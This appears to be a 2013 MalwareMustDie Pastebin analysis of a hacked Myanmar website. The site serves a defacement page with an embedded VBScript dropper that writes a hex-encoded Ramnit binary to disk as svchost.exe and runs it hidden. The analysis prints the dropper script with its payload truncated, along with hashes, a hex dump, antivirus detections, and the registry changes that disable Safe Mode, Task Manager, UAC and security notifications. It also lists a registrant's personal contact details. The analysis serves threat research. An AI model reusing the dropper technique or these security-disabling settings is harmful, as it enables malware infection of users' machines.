API tools faq
paste
MalwareMustDie

#MalwareMustDie - Thou Salt Not Hack + Inject Malware!!

MalwareMustDie
Mar 2nd, 2013
1,489
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 25.31 KB | None | 0 0
raw download clone embed print report
  1. # MalwareMustDie! @unixfreaxjp /malware]$ date
  2. # Sat Mar  2 15:33:51 JST 2013
  3. # Case: ...And the Hack Group Re-using the old-timer Malware..
  4. #       in this case: RAMNIT!!
  5.  
  6. // The below domain was just hacked....
  7.  
  8. Domain Name: MYANWEBS.COM
  9. Registrar: GODADDY.COM, LLC
  10. Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
  11. Domain Name: MYANWEBS.COM
  12.    Created on: 29-Nov-10
  13.    Expires on: 29-Nov-13
  14.    Last Updated on: 06-Nov-12
  15.  
  16. Registrant:
  17.    TKT Web Studio
  18.    No.45, Shwe Ta Chaung Road, Pyay, Pegu
  19.    Yangon,  NA, Myanmar
  20.  
  21. Administrative/Technical Contact:
  22.    AUNG, KYAW KYAW  kyawkyaw26273@gmail.com
  23.    TKT Web Studio
  24.    No.45, Shwe Ta Chaung Road, Pyay, Pegu
  25.    Yangon,  NA
  26.    Myanmar
  27.    +95.5326506
  28.  
  29. Domain servers in listed order:
  30.    NS1.MYANWEBS.COM    NS2.MYANWEBS.COM
  31.    NS3.MYANWEBS.COM    NS4.MYANWEBS.COM
  32.    NS5.MYANWEBS.COM
  33.  
  34. // The hacked domains spread by the below URL...
  35.  
  36. h00p://penjaga123.myanwebs.com/
  37.  
  38. // Let's check it out....
  39. // fetch and checks...
  40.  
  41. --2013-03-02 14:42:02--  h00p://penjaga123.myanwebs.com/
  42. Resolving penjaga123.myanwebs.com... seconds 0.00, 209.51.196.242
  43. Caching penjaga123.myanwebs.com => 209.51.196.242
  44. Connecting to penjaga123.myanwebs.com|209.51.196.242|:80... seconds 0.00, connected.
  45.   :
  46. GET / HTTP/1.0
  47. Referer: http://malwaremustdie.blogspot.com
  48. User-Agent: MalwareMustDie Still Banging Malware Moronz!
  49. Host: penjaga123.myanwebs.com
  50. HTTP request sent, awaiting response...
  51.    :
  52. HTTP/1.0 200 OK
  53. Date: Sat, 02 Mar 2013 05:41:45 GMT
  54. Server: ATS/3.2.0
  55. Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
  56. Expires: Sat, 02 Mar 2013 05:41:45 GMT
  57. Vary: Accept-Encoding,User-Agent
  58. Pragma: no-cache
  59. Content-Type: text/html
  60. Age: 2
  61. Connection: close
  62.   :
  63. 200 OK
  64. Length: unspecified [text/html]
  65. Saving to: `index.html'
  66. 2013-03-02 14:42:09 (140 KB/s) - `index.html' saved [824550]
  67.  
  68.  
  69. // looks like this... (elinks)
  70.                                                                              [lol.gif]
  71.                                                                               #OPWorld
  72.  
  73.    __________________________________________________________________________________________
  74.    __________________________________________________________________________________________
  75.  
  76.    hello world ..
  77.    This is the operation for the country of Myanmar.
  78.    Do not have the name of religion to carry out attacks on our site!
  79.    Our silence is not because we are weak,
  80.    we only demand retribution for our site that you hack ..
  81.    Lamers you simply useless! Our army is god ..
  82.    without insulting religion and your beliefs.
  83.    This is our way!
  84.  
  85.     Thank's: Legend Irhabi007 - Hmei7 - Syntax_error - 3vil666 - Bocah Netter -
  86.    Drac Code 101 - Mujahidin Cyber  // animated...
  87.  
  88.   __________________________________________________________________________________________
  89.   __________________________________________________________________________________________
  90.  
  91.   IFRAME: h00p://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F80972118&auto_play=true&show_artwork=true&color=ff7700
  92.                                                // some f*ckin music...
  93.  
  94. // Using below METAs:
  95.  
  96. <meta name="revisit-after" content="3">
  97. <meta name="rating" content="general">
  98. <meta name="classification" content="Internet Services">
  99. <meta name="googlebot" content="index,follow">
  100. <meta name="google rank" content="1">
  101. <meta name="robots" content="all">
  102. <meta name="robots schedule" content="auto">
  103.  
  104.  
  105. // Saved the malware binary into the PC as svchost.exe via VBScript
  106. // method: CreateObject("Scripting.FileSystemObject")
  107. //
  108. // And run it by using the Windows Script WScript.Shell.Run...
  109.  
  110. <SCRIPT Language=VBScript><!--
  111. DropFileName = "svchost.exe"
  112. WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000
  113. 000000000000000000000000000000000000000000000000000000000000000E800000
  114. 00E1FBA0E00B409CD21B80120444F53206D6F64652E0D0D0A2400000000000000D72D8
  115.   :
  116.   :
  117. 83B00C8B43A419EA051319A4422C6694D6B9006D4C6BFA184413161CDB446B9B5816E556
  118. 47B2B925A289418B2F487D4B8E713A64E68F01A930573A8B1B5BD2C84C0720CCB99C5915
  119. 62791956C46A1352C2B8DB97C0B643016782B16B5F3FEC20D28029FB257E1208E92338BB
  120. A8B1CCBF43994903D0831640459BE377D495BF10A5341C85CCA36FBDA94A1D37279AFEBF
  121. 34F996CAB780F9D948558655C4B019DAF9F4F6100EC46591F2024F9263448E14178B9DBB
  122. 44CA67E42C9B151B938631D3FCD4401FCCAB15106DBB151"
  123. Set FSO = CreateObject("Scripting.FileSystemObject")
  124. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  125. If FSO.FileExists(DropPath)=False Then
  126. Set FileObj = FSO.CreateTextFile(DropPath, True)
  127. For i = 1 To Len(WriteData) Step 2
  128. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  129. Next
  130. FileObj.Close
  131. End If
  132. Set WSHshell = CreateObject("WScript.Shell")
  133. WSHshell.Run DropPath, 0
  134. //--></SCRIPT>
  135.  
  136.  
  137. // dropped binary;
  138.  
  139. MD5    : e450435280ba806dc2d8115b172e1e40
  140. SHA256 : 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
  141.  
  142. Sections:
  143.   .text 0x1000 0x2200 8704
  144.   .data 0x4000 0x9730 4608
  145.   .rsrc 0xe000 0x78c 2048
  146.   .rdata 0xf000 0x1ae0f 108559
  147.   kgoodcb 0x2a000 0x13000 77824 <==== need depacked/decode
  148.   .text 0x3d000 0x33000 205824 <=== need depacked/decode
  149.  
  150. Entry Point at 0x31a00
  151. Virtual Address is 0x43d000
  152. CRC Fail: Claimed:  0, Actual:  416781
  153. Compile Time: 0x40617B91 [Wed Mar 24 12:14:09 2004 UTC]
  154.  
  155. // Faking Adobe software...
  156.  
  157.  LangID: 040904b0
  158.  LegalCopyright: Copyright \xa9 1996-2003 Macromedia, Inc.
  159.  InternalName: Macromedia Flash Player 7.0
  160.  FileVersion: 7,0,19,0
  161.  CompanyName: Macromedia, Inc.
  162.  LegalTrademarks: Macromedia Flash Player
  163.  ProductName: Shockwave Flash
  164.  ProductVersion: 7,0,19,0
  165.  FileDescription: Macromedia Flash Player 7.0  r19
  166.  OriginalFilename: SAFlashPlayer.exe
  167.  
  168. // Hex:
  169.  
  170. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  171. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  172. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  173. 0030   00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 00    ................
  174. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  175. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  176. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  177. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  178. 0080   D7 2D 86 2D 93 4C E8 7E 93 4C E8 7E 93 4C E8 7E    .-.-.L.~.L.~.L.~
  179. 0090   8F 03 B7 7E 91 4C E8 7E 9C 74 88 7E D3 4D E8 7E    ...~.L.~.t.~.M.~
  180. 00A0   C6 44 B3 7E 8E 4C E8 7E A0 CB E7 7E 92 4C E8 7E    .D.~.L.~...~.L.~
  181. 00B0   50 43 B7 7E B1 4C E8 7E 83 38 B2 7E 9F 4C E8 7E    PC.~.L.~.8.~.L.~
  182. 00C0   3A C2 B5 7E 92 4C E8 7E 52 69 63 68 93 4C E8 7E    :..~.L.~Rich.L.~
  183. 00D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  184. 00E0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 06 00    ........PE..L...
  185. 00F0   91 7B 61 40 00 00 00 00 00 00 00 00 E0 00 0F 01    .{a@............
  186. 0100   0B 01 06 04 00 22 00 00 00 E0 01 00 00 08 00 00    ....."..........
  187. 0110   00 D0 03 00 00 10 00 00 00 40 00 00 00 00 40 00    .........@....@.
  188. 0120   00 10 00 00 00 02 00 00 04 00 00 00 05 00 01 00    ................
  189. 0130   04 00 00 00 00 00 00 00 00 00 07 00 00 04 00 00    ................
  190. 0140   00 00 00 00 02 00 00 80 00 00 40 00 00 60 00 00    ..........@..`..
  191. 0150   00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00    ..@.............
  192. 0160   00 00 00 00 00 00 00 00 AC 16 00 00 A0 00 00 00    ................
  193. 0170   00 E0 00 00 8C 07 00 00 D0 43 00 00 18 00 00 00    .........C......
  194. 0180   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  195. 0190   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  196. 01A0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  197. 01B0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  198. 01C0   00 10 00 00 B0 01 00 00 00 00 00 00 00 00 00 00    ................
  199. 01D0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  200. 01E0   2E 74 65 78 74 00 00 00 00 22 00 00 00 10 00 00    .text...."......
  201.  
  202.  
  203. // Quick Check Reputation on Virus Total...
  204.  
  205. URL:       https://www.virustotal.com/en/file/3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8/analysis/1362204046/
  206. SHA256:    3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
  207. SHA1:      823cb691fa3193ff7bb7fd071acf9d1f68edf527
  208. MD5:       e450435280ba806dc2d8115b172e1e40
  209. File size: 399.9 KB ( 409536 bytes )
  210. File name: SAFlashPlayer.exe
  211. File type: Win32 EXE
  212. Tags:      peexe
  213. Detection: 41 / 46
  214. Analysis:  2013-03-02 06:00:46 UTC ( 5 minutes ago )
  215.  
  216. Malware Names:
  217. nProtect                 : Virus/W32.SpyEye
  218. CAT-QuickHeal            : W32.Ramnit.A
  219. McAfee                   : W32/Ramnit.a
  220. Malwarebytes             : Trojan.Downloader
  221. K7AntiVirus              : Virus
  222. Agnitum                  : Win32.Sality.BK
  223. F-Prot                   : W32/Ramnit.D
  224. Symantec                 : Packed.Protexor!gen1
  225. Norman                   : Sality.ZHB
  226. TotalDefense             : Win32/Ramnit.C
  227. TrendMicro-HouseCall     : PE_RAMNIT.DEN
  228. Avast                    : Win32:RmnDrp
  229. ClamAV                   : W32.Ramnit-3
  230. Kaspersky                : Virus.Win32.Nimnul.a
  231. BitDefender              : Win32.Ramnit.N
  232. NANO-Antivirus           : Virus.Win32.Nimnul.bmnup
  233. ViRobot                  : Win32.Nimnul.A
  234. Emsisoft                 : Win32.Ramnit.N (B)
  235. Comodo                   : Virus.Win32.Ramnit.K
  236. F-Secure                 : Win32.Ramnit.N
  237. DrWeb                    : Win32.Rmnet.8
  238. VIPRE                    : Virus.Win32.Ramnit.b (v)
  239. AntiVir                  : W32/Ramnit.C
  240. TrendMicro               : PE_RAMNIT.DEN
  241. McAfee-GW-Edition        : Heuristic.BehavesLike.Win32.Suspicious-BAY.K
  242. Sophos                   : W32/Ramnit-A
  243. Jiangmin                 : Win32/IRCNite.wi
  244. Kingsoft                 : Win32.Ramnit.lx.30720
  245. Microsoft                : Virus:Win32/Ramnit.I
  246. SUPERAntiSpyware         : Trojan.Agent/Gen-Pune
  247. GData                    : Win32.Ramnit.N
  248. Commtouch                : W32/Ramnit.D
  249. AhnLab-V3                : Win32/Ramnit.I
  250. VBA32                    : Virus.Win32.Nimnul.b
  251. PCTools                  : HeurEngine.Protexor
  252. ESET-NOD32               : Win32/Ramnit.H
  253. Rising                   : Win32.Mgr.a
  254. Ikarus                   : Virus.Win32.Ramnit
  255. Fortinet                 : W32/Ramnit.C
  256. AVG                      : Win32/Zbot.G
  257. Panda                    : W32/Nimnul.A
  258.  
  259.  
  260. // Malware Created / Overwrited files:
  261.  
  262. C:\Documents and Settings\User\Local Settings\Temp\winncbnga.exe
  263. C:\Program Files\Microsoft\WaterMark.exe
  264. C:\TEST\samplemgr.exe
  265. C:\WINDOWS\system32\dmlconf.dat
  266. C:\WINDOWS\system.ini
  267.  
  268. // Kicked-off processes...
  269.  
  270. 0x1dc   WaterMark.exe   C:\Program Files\Microsoft\WaterMark.exe
  271. 0x1e4   WaterMark.exe   C:\Program Files\Microsoft\WaterMark.exe
  272. 0x20c   svchost.exe C:\WINDOWS\system32\svchost.exe  // this binary..
  273. 0x210   svchost.exe C:\WINDOWS\system32\svchost.exe  // this binary..
  274.  
  275. // Loaded SYS/driver
  276.  
  277. \SystemRoot\System32\Drivers\Fastfat.SYS
  278.  
  279. // all of these registry are deleted....
  280.  
  281. HKLM\System\CurrentControlSet\Control\SafeBoot\AlternateShell   REG_SZ  16  "cmd.exe"
  282. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}REG_SZ  66  "Universal Serial Bus controllers"
  283. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}REG_SZ  26  "CD-ROM Drive"
  284. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "DiskDrive"
  285. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}REG_SZ  64  "Standard floppy disk controller"
  286. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Hdc"
  287. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "Keyboard"
  288. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}REG_SZ  12  "Mouse"
  289. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}REG_SZ  32  "PCMCIA Adapters"
  290. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}REG_SZ  24  "SCSIAdapter"
  291. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}REG_SZ  14  "System"
  292. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}REG_SZ  36  "Floppy disk drive"
  293. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}REG_SZ  14  "Volume"
  294. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}REG_SZ  48  "Human Interface Devices"
  295. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\ REG_SZ  16  "Service"
  296. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base\    REG_SZ  26  "Driver Group"
  297. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\   REG_SZ  26  "Driver Group"
  298. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\    REG_SZ  26  "Driver Group"
  299. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\    REG_SZ  16  "Service"
  300. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunchREG_SZ  16  "Service"
  301. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\ REG_SZ  16  "Service"
  302. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sysREG_SZ  14  "Driver"
  303. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\    REG_SZ  14  "Driver"
  304. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sysREG_SZ  14  "Driver"
  305. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\    REG_SZ  16  "Service"
  306. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\    REG_SZ  16  "Service"
  307. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system\ REG_SZ  26  "Driver Group"
  308. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\FilterREG_SZ  26  "Driver Group"
  309. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\ REG_SZ  16  "Service"
  310. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\    REG_SZ  16  "Service"
  311. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\   REG_SZ  26  "Driver Group"
  312. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay\    REG_SZ  16  "Service"
  313. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP FilterREG_SZ  26  "Driver Group"
  314. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk\    REG_SZ  26  "Driver Group"
  315. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs\   REG_SZ  16  "Service"
  316. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI ClassREG_SZ  26  "Driver Group"
  317. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\    REG_SZ  14  "Driver"
  318. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sysREG_SZ  50  "FSFilter System Recovery"
  319. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService\   REG_SZ  16  "Service"
  320. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender\ REG_SZ  26  "Driver Group"
  321. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\ REG_SZ  14  "Driver"
  322. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\ REG_SZ  14  "Driver"
  323. HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt\ REG_SZ  16  "Service"
  324. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}REG_SZ  66  "Universal Serial Bus controllers"
  325. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}REG_SZ  26  "CD-ROM Drive"
  326. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "DiskDrive"
  327. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}REG_SZ  64  "Standard floppy disk controller"
  328. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Hdc"
  329. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "Keyboard"
  330. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}REG_SZ  12  "Mouse"
  331. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}REG_SZ  8   "Net"
  332. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}REG_SZ  20  "NetClient"
  333. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}REG_SZ  22  "NetService"
  334. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}REG_SZ  18  "NetTrans"
  335. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}REG_SZ  32  "PCMCIA Adapters"
  336. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}REG_SZ  24  "SCSIAdapter"
  337. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}REG_SZ  14  "System"
  338. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}REG_SZ  36  "Floppy disk drive"
  339. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}REG_SZ  14  "Volume"
  340. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}REG_SZ  48  "Human Interface Devices"
  341. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD\ REG_SZ  16  "Service"
  342. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\ REG_SZ  16  "Service"
  343. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base\    REG_SZ  26  "Driver Group"
  344. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\   REG_SZ  26  "Driver Group"
  345. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system\    REG_SZ  26  "Driver Group"
  346. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser\ REG_SZ  16  "Service"
  347. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\    REG_SZ  16  "Service"
  348. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunchREG_SZ  16  "Service"
  349. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp\    REG_SZ  16  "Service"
  350. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin\ REG_SZ  16  "Service"
  351. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sysREG_SZ  14  "Driver"
  352. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\    REG_SZ  14  "Driver"
  353. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sysREG_SZ  14  "Driver"
  354. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver\    REG_SZ  16  "Service"
  355. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache\    REG_SZ  16  "Service"
  356. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog\    REG_SZ  16  "Service"
  357. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system\ REG_SZ  26  "Driver Group"
  358. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\FilterREG_SZ  26  "Driver Group"
  359. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\ REG_SZ  16  "Service"
  360. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\   REG_SZ  14  "Driver"
  361. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\   REG_SZ  14  "Driver"
  362. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\    REG_SZ  16  "Service"
  363. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\   REG_SZ  16  "Service"
  364. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts\ REG_SZ  16  "Service"
  365. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger\   REG_SZ  16  "Service"
  366. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\    REG_SZ  26  "Driver Group"
  367. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS\    REG_SZ  26  "Driver Group"
  368. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\ REG_SZ  16  "Service"
  369. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\ REG_SZ  16  "Service"
  370. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\    REG_SZ  26  "Driver Group"
  371. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT\   REG_SZ  16  "Service"
  372. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\ REG_SZ  26  "Driver Group"
  373. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon\    REG_SZ  16  "Service"
  374. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetManREG_SZ  16  "Service"
  375. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network\ REG_SZ  26  "Driver Group"
  376. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\ REG_SZ  26  "Driver Group"
  377. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\ REG_SZ  16  "Service"
  378. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\   REG_SZ  26  "Driver Group"
  379. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\    REG_SZ  16  "Service"
  380. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP FilterREG_SZ  26  "Driver Group"
  381. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\ REG_SZ  26  "Driver Group"
  382. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk\    REG_SZ  26  "Driver Group"
  383. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sysREG_SZ  14  "Driver"
  384. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\   REG_SZ  14  "Driver"
  385. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\   REG_SZ  14  "Driver"
  386. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\   REG_SZ  16  "Service"
  387. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs\   REG_SZ  16  "Service"
  388. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI ClassREG_SZ  26  "Driver Group"
  389. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\    REG_SZ  14  "Driver"
  390. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\    REG_SZ  16  "Service"
  391. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sysREG_SZ  50  "FSFilter System Recovery"
  392. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService\   REG_SZ  16  "Service"
  393. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\ REG_SZ  26  "Driver Group"
  394. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\ REG_SZ  26  "Driver Group"
  395. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip\   REG_SZ  16  "Service"
  396. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI\ REG_SZ  26  "Driver Group"
  397. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sysREG_SZ  14  "Driver"
  398. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\   REG_SZ  14  "Driver"
  399. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice\ REG_SZ  16  "Service"
  400. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys\ REG_SZ  14  "Driver"
  401. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\ REG_SZ  14  "Driver"
  402. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\ REG_SZ  16  "Service"
  403. HKLM\System\CurrentControlSet\Control\SafeBoot\Network\WZCSVCREG_SZ  16  "Service"
  404.  
  405.  
  406. // Registry New Added Key/Values:
  407.  
  408. HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline  REG_DWORD   4   0x0
  409. HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools REG_DWORD   4   0x1
  410. HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr   REG_DWORD   4   0x1
  411. HKLM\Software\Microsoft\Security Center\Svc\AntiVirusDisableNotify  REG_DWORD   4   0x1
  412. HKLM\Software\Microsoft\Security Center\Svc\AntiVirusOverride   REG_DWORD   4   0x1
  413. HKLM\Software\Microsoft\Security Center\Svc\FirewallDisableNotify   REG_DWORD   4   0x1
  414. HKLM\Software\Microsoft\Security Center\Svc\FirewallOverride    REG_DWORD   4   0x1
  415. HKLM\Software\Microsoft\Security Center\Svc\UacDisableNotify    REG_DWORD   4   0x1
  416. HKLM\Software\Microsoft\Security Center\Svc\UpdatesDisableNotify    REG_DWORD   4   0x1
  417. HKLM\Software\Microsoft\Security Center\UacDisableNotify    REG_DWORD   4   0x1
  418. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA    REG_DWORD   4   0x0
  419. HKLM\System\CurrentControlSet\Services\amsint32\DisplayName REG_SZ  18  "amsint32"
  420. HKLM\System\CurrentControlSet\Services\amsint32\Enum\0  REG_SZ  52  "Root\LEGACY_AMSINT32\0000"
